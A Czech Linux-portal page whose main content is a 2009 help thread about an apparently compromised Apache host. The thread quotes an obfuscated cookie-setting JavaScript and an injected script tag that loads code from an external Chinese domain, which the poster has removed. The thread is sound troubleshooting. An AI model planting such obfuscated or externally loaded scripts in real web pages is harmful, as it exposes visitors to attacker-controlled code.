abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
včera 16:00 | Nová verze

Byl vydán Mozilla Firefox 51.0. Z novinek lze upozornit například na upozorňování na přihlašování přes nešifrované spojení (HTTP), podporu pro přehrávání bezeztrátového formátu FLAC nebo podporu WebGL 2. Podrobné informace v poznámkách k vydání a na stránce věnované vývojářům. Řešeny jsou také bezpečnostní chyby.

Ladislav Hagara | Komentářů: 2
23.1. 17:25 | IT novinky

Do prodeje (Farnell) se dostal jednodeskový počítač Tinker Board (unboxing). Jedná se o konkurenci Raspberry Pi 3 od společnosti Asus. Porovnání (jpg) těchto počítačů například na CNXSoft. Cena Tinker Boardu je 55 £.

Ladislav Hagara | Komentářů: 15
23.1. 14:44 | Zajímavý projekt

Byla zveřejněna pravidla hackerské soutěže Pwn2Own 2017, jež proběhne od 15. do 17. března v rámci bezpečnostní konference CanSecWes ve Vancouveru. Soutěžit se bude o více než milion dolarů v pěti kategoriích. Letos se bude útočit i na Ubuntu. Jedná se již o 10. ročník této soutěže.

Ladislav Hagara | Komentářů: 2
23.1. 13:33 | Nová verze

Po sedmi měsících vývoje od vydání verze 5.7 byla vydána verze 5.8 (YouTube) toolkitu Qt. Z novinek lze zmínit například Qt Lite pro vestavěná zařízení. Nově jsou plně podporovány moduly Qt Wayland Compositor (YouTube) a Qt SCXML (YouTube). Současně byla vydána verze 4.2.1 integrovaného vývojového prostředí (IDE) Qt Creator.

Ladislav Hagara | Komentářů: 1
23.1. 11:52 | Pozvánky

Lednový Prague Containers Meetup se koná ve čtvrtek 26. ledna 2017 od 18:00 v Apiary, Pernerova 49, Praha 8. Přijďte se podívat na přednášky o Enterprise Kubernetes a Jenkins as a code.

little-drunk-jesus | Komentářů: 0
23.1. 11:40 | Pozvánky

Program letošního ročníku konference Prague PostgreSQL Developer Days, která se koná již 15. a 16. února 2017 na ČVUT FIT, Thákurova 9, Praha 6, byl dnes zveřejněn. Najdete ho na stránkách konference včetně anotací přednášek a školení. Registrace na konferenci bude otevřena zítra (24. ledna) v brzkých odpoledních hodinách.

TomasVondra | Komentářů: 0
22.1. 02:20 | Zajímavý článek

David Revoy, autor open source webového komiksu Pepper&Carrot nebo portrétu GNU/Linuxu, upozorňuje na svém blogu, že nový Inkscape 0.92 rozbíjí dokumenty vytvořené v předchozích verzích Inkscape. Problém by měl být vyřešen v Inkscape 0.92.2 [reddit].

Ladislav Hagara | Komentářů: 0
22.1. 02:02 | Komunita

Øyvind Kolås, hlavní vývojář grafických knihoven GEGL a babl, které využívá grafický program GIMP, žádá o podporu na Patreonu. Díky ní bude moci pracovat na vývoji na plný úvazek. Milník 1000 $, který by stačil na holé přežití, se již téměř podařilo vybrat, dalším cílem je dosažení 2500 $, které mu umožní běžně fungovat ve společnosti.

xkomczax | Komentářů: 12
21.1. 23:54 | Pozvánky

DevConf.cz 2017, již devátý ročník jedné z největších akcí zaměřených na Linux a open source ve střední Evropě, proběhne od pátku 27. ledna do neděle 29. ledna v prostorách Fakulty informačních technologií Vysokého učení technického v Brně. Na programu je celá řada zajímavých přednášek a workshopů. Letos je povinná registrace.

Ladislav Hagara | Komentářů: 0
21.1. 22:11 | Nová verze

Byla vydána verze 1.0.0 emulátoru terminálu Terminology postaveného nad EFL (Enlightenment Foundation Libraries). Přehled novinek v poznámkách k vydání.

Ladislav Hagara | Komentářů: 0
Jak se stavíte k trendu ztenčování přenosných zařízení (smartphony, notebooky)?
 (12%)
 (2%)
 (72%)
 (3%)
 (11%)
Celkem 395 hlasů
 Komentářů: 39, poslední včera 19:30
Rozcestník
Reklama

Dotaz: Pavděpodobně napadený Apache

18.9.2009 16:18 leninzprahy | Praha
Pavděpodobně napadený Apache
Přečteno: 477×

Chci se poradit, jestli se někdo s něčím podobným nesetkal, než začnu urgovat správce serveru.

Nepravidelně se stává, že při přístupu na web běžícím na jednom serveru se místo požadovaného obsahu vrátí jen krátký javascript:

<script type="text/javascript" language="javascript"> var lclbi=new Date( ); lclbi.setTime(lclbi.getTime( )+014*074*074*01750); document.cookie="n\x5f\x73e\x73\x73\x5f\x69\x64\x3d\x38dbd07\x33\x64c24b\x64\x378\x32\x31c\x33\x35\x34\x332\x37\x35\x33032ef\x62"+"\x3b\x20pat\x68\075\x2f; \x65xpir\x65s="+lclbi.toGMTString( ); </script>

Dekódované je to:

<script type="text/javascript" language="javascript"> var lclbi=new Date( ); lclbi.setTime(lclbi.getTime( )+014*074*074*01750); document.cookie="n_sess_id=8dbd073dc24bd7821c35432753032efb; path=/; expires="+lclbi.toGMTString( ); </script>

Občas je to k vidění např. na http://www.smaltovna.cz/ ale stejně se chovají další weby na stejném serveru jak už jsem psal.

Kdysi jsme řešily podobný problém a při googlení jsem narazil na dokument http://bt.uptime.cz/apache/apache_attack_EN.pdf který něco takového popisuje, ale toto mi přijde trochu jiné.

Na dotaz "n_sess_id" google mlčí, proto se ptám zde. Server sdělí akorát verzi Apache/2.0.5.

Soubory webu se zadjí být nezměněny, problém s ukradenýmy hesly z TCM jsme už řešili, toto bude něco jiného.

Máte někdo s podobnými problémy nějaké zkušenosti? Předem děkuju za jakoukoliv odpověď.

Připomínám že nejsem správcem serveru, mám jen ftp přístup, jde o osobní zvědavost a o to, co správci napsat (kromě "Máš to rozbitý" :-) )

zahrádka a pivo jsou nejlepší v léťe, rum v zimě

Odpovědi

18.9.2009 17:37 ycuzo | skóre: 3
Rozbalit Rozbalit vše Re: Pavděpodobně napadený Apache

Len tak cisto zo zaujmu som pozrel na tu stranku smaltovna.cz a ejhle,cista prazdna strana mrknem na zdrojak a ten javascript je tam,pri reloade uz isla stranka normalne. Pozrel som zdrojak stranok,prve mi padlo do oci nejaky javascript co sa natahuje s nejakeho cinskeho servevera a potom este nejaky emonitor.cz alebo co,nemoze byt chyba tam ? Neskusal si najprv odmazat tie javascripty a tak skusat ci sa objavy ta zahada ? Sice sa v javascripte moc nevyznam ani ho nemam rad,ale tenot kus kodu mi nejak pripomina skor akesi pocitanie statistiky,alebo nieco podobne...

H0ax avatar 18.9.2009 18:14 H0ax | skóre: 36 | blog: Odnikud_nikam
Rozbalit Rozbalit vše Re: Pavděpodobně napadený Apache
podívej se na "ps -e" a hledej proces s podobným jménem jako tohle: dse84abzw1abzw1 nebo podobný
LinuxWay | blog |  LiCo
18.9.2009 18:34 leninzprahy | Praha
Rozbalit Rozbalit vše Re: Pavděpodobně napadený Apache

Díky za nápady, vloženého

<!-- ad --><script type="text/javascript" src="http://jpchase.cn/js.js"></script><!-- /ad -->

na začátku body a

<meta name="verify-v1" content="52mbi00Wp0KQDBlEVaghU25iPjp3aQoCBGLS+fpVd68=" />

v hlavičce jsem si nevšiml (odstraněno), bohužel ostatní weby jsou bez toho ale se stejným problémem.

Běžící procesy si prohlédnout nemůžu, mám jen ftp přístup, ale přesměruji nápad adminovi.

Díky

 

zahrádka a pivo jsou nejlepší v léťe, rum v zimě
19.9.2009 19:27 ycuzo | skóre: 3
Rozbalit Rozbalit vše Re: Pavděpodobně napadený Apache

Este tam mas jednu malu dekorativnu chybku :)

</html><script>check_content()</script> a nemas ukoncene </body>

 

21.10.2009 10:48 Jirka
Rozbalit Rozbalit vše Re: Pavděpodobně napadený Apache
Ahoj,

mám úplně stejný problém a chtěl bych se zeptat, jestli se ti jej podařilo vyřešit. Píšu přímo sem, neboť jsem na tebe nenašel kontakt. Už to řeším pěkně dlouho, admin mi napsal, že je chyba v mé aplikaci, ale týden ji hledám, loguji co se dá a nemůžu tu díru najít.

Díky za jakoukoliv radu, Jirka

blackj (a) seznam cz

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267   www.czech-server.cz
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.